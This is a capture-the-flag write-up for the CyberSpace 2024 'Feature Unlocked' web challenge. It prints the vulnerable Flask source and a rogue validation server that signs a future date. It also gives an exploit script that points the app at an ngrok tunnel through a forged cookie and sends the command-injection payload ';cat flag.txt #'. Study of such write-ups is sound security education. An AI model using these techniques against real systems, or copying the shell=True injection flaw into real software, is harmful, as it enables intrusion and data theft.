Cyberspace2024 | Feature Unlocked

Introduction#

Feature unlocked is part of the first wave of the web and is one of the first challanges I solved. Made by cryptocat, who we salute, it is a fairly simple challange if you read the code correctly.

Source#

1
import subprocess
2
import base64
3
import json
4
import time
5
import requests
6
import os
7
from flask import Flask, request, render_template, make_response, redirect, url_for
8
from Crypto.Hash import SHA256
9
from Crypto.PublicKey import ECC
10
from Crypto.Signature import DSS
11
from itsdangerous import URLSafeTimedSerializer
12

13
app = Flask(__name__)
14
app.secret_key = os.urandom(16)
15
serializer = URLSafeTimedSerializer(app.secret_key)
16

17
DEFAULT_VALIDATION_SERVER = 'http://127.0.0.1:1338'
18
NEW_FEATURE_RELEASE = int(time.time()) + 7 * 24 * 60 * 60
19
DEFAULT_PREFERENCES = base64.b64encode(json.dumps({
20
    'theme': 'light',
21
    'language': 'en'
22
}).encode()).decode()
23

24

25
def get_preferences():
26
    preferences = request.cookies.get('preferences')
27
    if not preferences:
28
        response = make_response(render_template(
29
            'index.html', new_feature=False))
30
        response.set_cookie('preferences', DEFAULT_PREFERENCES)
31
        return json.loads(base64.b64decode(DEFAULT_PREFERENCES)), response
32
    return json.loads(base64.b64decode(preferences)), None
33

34

35
@app.route('/')
36
def index():
37
    _, response = get_preferences()
38
    return response if response else render_template('index.html', new_feature=False)
39

40

41
@app.route('/release')
42
def release():
43
    token = request.cookies.get('access_token')
44
    if token:
45
        try:
46
            data = serializer.loads(token)
47
            if data == 'access_granted':
48
                return redirect(url_for('feature'))
49
        except Exception as e:
50
            print(f"Token validation error: {e}")
51

52
    validation_server = DEFAULT_VALIDATION_SERVER
53
    if request.args.get('debug') == 'true':
54
        preferences, _ = get_preferences()
55
        validation_server = preferences.get(
56
            'validation_server', DEFAULT_VALIDATION_SERVER)
57

58
    if validate_server(validation_server):
59
        response = make_response(render_template(
60
            'release.html', feature_unlocked=True))
61
        token = serializer.dumps('access_granted')
62
        response.set_cookie('access_token', token, httponly=True, secure=True)
63
        return response
64

65
    return render_template('release.html', feature_unlocked=False, release_timestamp=NEW_FEATURE_RELEASE)
66

67

68
@app.route('/feature', methods=['GET', 'POST'])
69
def feature():
70
    token = request.cookies.get('access_token')
71
    if not token:
72
        return redirect(url_for('index'))
73

74
    try:
75
        data = serializer.loads(token)
76
        if data != 'access_granted':
77
            return redirect(url_for('index'))
78

79
        if request.method == 'POST':
80
            to_process = request.form.get('text')
81
            try:
82
                word_count = f"echo {to_process} | wc -w"
83
                output = subprocess.check_output(
84
                    word_count, shell=True, text=True)
85
            except subprocess.CalledProcessError as e:
86
                output = f"Error: {e}"
87
            return render_template('feature.html', output=output)
88

89
        return render_template('feature.html')
90
    except Exception as e:
91
        print(f"Error: {e}")
92
        return redirect(url_for('index'))
93

94

95
def get_pubkey(validation_server):
96
    try:
97
        response = requests.get(f"{validation_server}/pubkey")
98
        response.raise_for_status()
99
        return ECC.import_key(response.text)
100
    except requests.RequestException as e:
101
        raise Exception(
102
            f"Error connecting to validation server for public key: {e}")
103

104

105
def validate_access(validation_server):
106
    pubkey = get_pubkey(validation_server)
107
    try:
108
        response = requests.get(validation_server)
109
        response.raise_for_status()
110
        data = response.json()
111
        date = data['date'].encode('utf-8')
112
        signature = bytes.fromhex(data['signature'])
113
        verifier = DSS.new(pubkey, 'fips-186-3')
114
        verifier.verify(SHA256.new(date), signature)
115
        return int(date)
116
    except requests.RequestException as e:
117
        raise Exception(f"Error validating access: {e}")
118

119

120
def validate_server(validation_server):
121
    try:
122
        date = validate_access(validation_server)
123
        return date >= NEW_FEATURE_RELEASE
124
    except Exception as e:
125
        print(f"Error: {e}")
126
    return False
127

128

129
if __name__ == '__main__':
130
    app.run(host='0.0.0.0', port=1337)

1
from flask import Flask, jsonify
2
import time
3
from Crypto.Hash import SHA256
4
from Crypto.PublicKey import ECC
5
from Crypto.Signature import DSS
6

7
app = Flask(__name__)
8

9
key = ECC.generate(curve='p256')
10
pubkey = key.public_key().export_key(format='PEM')
11

12

13
@app.route('/pubkey', methods=['GET'])
14
def get_pubkey():
15
    return pubkey, 200, {'Content-Type': 'text/plain; charset=utf-8'}
16

17

18
@app.route('/', methods=['GET'])
19
def index():
20
    date = str(int(time.time()))
21
    h = SHA256.new(date.encode('utf-8'))
22
    signature = DSS.new(key, 'fips-186-3').sign(h)
23

24
    return jsonify({
25
        'date': date,
26
        'signature': signature.hex()
27
    })
28

29

30
if __name__ == '__main__':
31
    app.run(host='127.0.0.1', port=1338)

The application is divided into two parts: the main one, where we find the web application, and a server used to validate the access token with the access_garantied parameter for the release of the feature.

One thing that immediately stands out is a part of the main code where a debug mode is given.

1
if request.args.get('debug') == 'true':
2
  preferences, _ = get_preferences()
3
  validation_server = preferences.get(
4
  'validation_server', DEFAULT_VALIDATION_SERVER)

If the get arguments have the debug=true option, it will take the validation server from our preferences, which we remember to be a simple base64 cookie from a json so easily replicable.

Solution#

What we can do is give the application its own validation server, which is simply a copy of our own, except that we can change the date of the server to make the feature.

1

2
from flask import Flask, jsonify
3
import time
4
from Crypto.Hash import SHA256
5
from Crypto.PublicKey import ECC
6
from Crypto.Signature import DSS
7

8
app = Flask(__name__)
9

10
key = ECC.generate(curve='p256')
11
pubkey = key.public_key().export_key(format='PEM')
12

13

14
@app.route('/pubkey', methods=['GET'])
15
def get_pubkey():
16
    print("Pubkey: " + pubkey)
17
    return pubkey, 200, {'Content-Type': 'text/plain; charset=utf-8'}
18

19

20
@app.route('/', methods=['GET'])
21
def index():
22
    date = str(int(time.time()) + 7 * 24 * 60 * 60)
23
    h = SHA256.new(date.encode('utf-8'))
24
    signature = DSS.new(key, 'fips-186-3').sign(h)
25

26
    print("Date: " + date)
27
    print("Signature: " + signature.hex())
28
    print("Validating signature...")
29

30
    print(jsonify({
31
        'date': date,
32
        'signature': signature.hex()
33
    }))
34

35
    return jsonify({
36
        'date': date,
37
        'signature': signature.hex()
38
    })
39

40

41
if __name__ == '__main__':
42
    app.run(host='127.0.0.1', port=1338)

1
#!/usr/bin/python3
2

3
import base64
4
import requests
5
import json
6
from bs4 import BeautifulSoup
7

8
BASE_URL = "https://feature-unlocked-web-challs.csc.tf"
9
URL_HOOK = "https://3fcb-79-33-159-173.ngrok-free.app" # ngrok tunnel with evil_validation.py in listening (so run python3 evil_validation; ngrok http 1338 )
10

11
s = requests.Session()
12

13
def get_validation():
14

15
  preference = base64.b64encode(json.dumps({
16
      'theme': 'light',
17
      'language': 'en',
18
      'validation_server': URL_HOOK
19
  }).encode()).decode()
20

21
  r = s.get(f"{BASE_URL}/release", params={"debug": "true"},
22
            cookies={"preferences": preference})
23

24
  print(f"{s.cookies=}")
25

26
def get_flag():
27
  payload = ';cat flag.txt #' # Bypass for  word_count = f"echo {to_process} | wc -w"
28
  r = s.post(f"{BASE_URL}/feature",data={"text":payload})
29
  soup = BeautifulSoup(r.text, 'html.parser')
30
  print("Flag: " + (soup.find('pre').text).strip())
31

32
def main():
33
  get_validation()
34
  get_flag()
35

36

37
if __name__ == "__main__":
38
  main()
39

40
# goodluck by @akiidjk

flag: CSCTF{d1d_y0u_71m3_7r4v3l_f0r_7h15_fl46?!}